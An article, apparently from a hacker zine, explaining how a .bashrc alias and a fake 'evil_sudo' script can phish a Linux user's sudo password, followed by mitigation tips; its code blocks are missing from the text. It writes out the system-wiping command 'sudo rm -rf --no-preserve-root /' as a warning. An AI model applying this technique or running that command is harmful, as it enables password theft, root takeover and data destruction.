Gone Phishin'
by Columbo
So you've installed Linux. You were tired of Windows and how insecure it was. You can just forget about security issues now that you have an open-source or maybe even straight up Richard Stallman approved Libre alternative. Right? Think again.
If you're familiar with the world of "UNIX-like" operating systems, then you probably know about the sudo command. Sudo, which stands for "superuser do" or "substitute user do," lets you run commands with the privileges of another user. Most commonly, it is used to elevate privileges to the administrator so you can perform maintenance on the system or install new software.
Sudo is installed by default on many Linux distros, including but not limited to Ubuntu. In the sudoers file (a configuration file usually found at /etc/sudoers), you'll find the following line is often included by default:
This will give any user in the "sudo" group the right to do almost anything on the machine as long as they supply their password. While this is arguably a lot safer than running as root, there is still plenty of room for abuse. Just for fun, let's take a look at one of the reasons this could be a less than ideal way to run your system.
Depending on which shell you're running, a resource configuration file may determine certain settings. This file is often found in a user's home directory and usually doesn't require any special privileges to edit as long as you're the user. If you're using Bash, this is probably located in your home folder and named ".bashrc" (the period before the name makes it hidden).
Inside the .bashrc file we can add aliases, which can be used as shortcuts for certain commands. These aliases can be very convenient if you want to simplify commands. For example, instead of typing out a long string to update the system, you could have the command "update" run the much longer command.
I'm going to show you how this could be used for more nefarious purposes. How about we slip in an alias for an already existing command like sudo?
(Note: in these first few examples, the dollar sign indicates that a non-root user on the machine is executing the command in the terminal. This is not to be confused with the Bash script below where the dollar signs indicate a variable. That's not to say these first few commands couldn't be part of another script that secretly adds this alias and plants an "evil_sudo" file on your machine.)
If the user is running Bash, then this first command will make the sudo command execute a file in the home directory named "evil_sudo" instead of sudo. Now, why not make an evil_sudo file?
Let's make sure that file has the correct permissions to be executed:
Now open up your evil_sudo file and put the following inside:
This is a simple script to imitate a sudo password prompt and phish the password from the user. The script steals the password and puts it into a file. The script then uses the password to issue a nonsense sudo command.
At the time of writing, on a lot of popular distributions of Linux, this will activate a token that lets us use sudo without a password for something like 15 minutes depending on the configuration. Then finally, the actual command the user input is run so everything looks normal. The reason I didn't just run the user's command from the start is that when you give sudo the password with the "-S" switch you may not be able to respond to Y/N prompts or input any data after it's run. The "-S" switch is required because we're giving the sudo password via a terminal command.
There's obviously nothing stopping you from adding further commands to be run with root privileges. For example, it would be trivial from here on out to steal private encryption keys, or bitcoin wallets from all the users on the system. You can send those suckers straight to your FTP server. With the sudo password, you have root. You own the system.
There are a number of things you can do to mitigate against an attack like this.
1.) Configure sudo to prompt you for a password every time it's used (rather than activating a temporary token for 15 minutes or so).
Change the line in your "/etc/sudoers" file that reads:
to the following:
If these settings are already in place, you could alter the bash script to run the actual command in place of the fake command. It would still save the password in a file, and you could use that to your advantage, but it would be obvious something was wrong if the user input a command which required an additional response (such as "sudo apt upgrade").
2.) Only run scripts from sources you trust. Did someone give you a cool terminal color testing script in IRC? Make sure you at least read the code before you run it.
3.) Have you been given a list of commands to fix a problem with your computer? Make sure you know what you're typing in. The command "sudo rm -rf --no-preserve-root /" will not make your sound suddenly start working. It will just delete a lot of stuff.
4.) You could configure sudo to run a few commands without a password, and move over to another TTY to do anything requiring administrative privileges from the actual root account. Here's an example. You can put these things in your /etc/sudoers file under "User privilege specification:"
This will (assuming you have these files on your system) allow all sudo users to update the system with apt, mount, and unmount disks; view the available disk information; and reboot the machine without the need for a password. Perhaps that's not the ideal setup, but at least your password won't get phished when you run those commands.
5.) Do not copy and paste code from a website directly into the terminal. Malicious code can be hidden within the text copied.
6.) Be careful when using Curl to pipe code directly into the terminal. Use a checksum to verify the integrity of the file, make sure you're connected to a trusted site using TLS, or both.
I suppose that pretty much sums it up. Just be careful out there and don't be a jerk or it might come back to haunt you.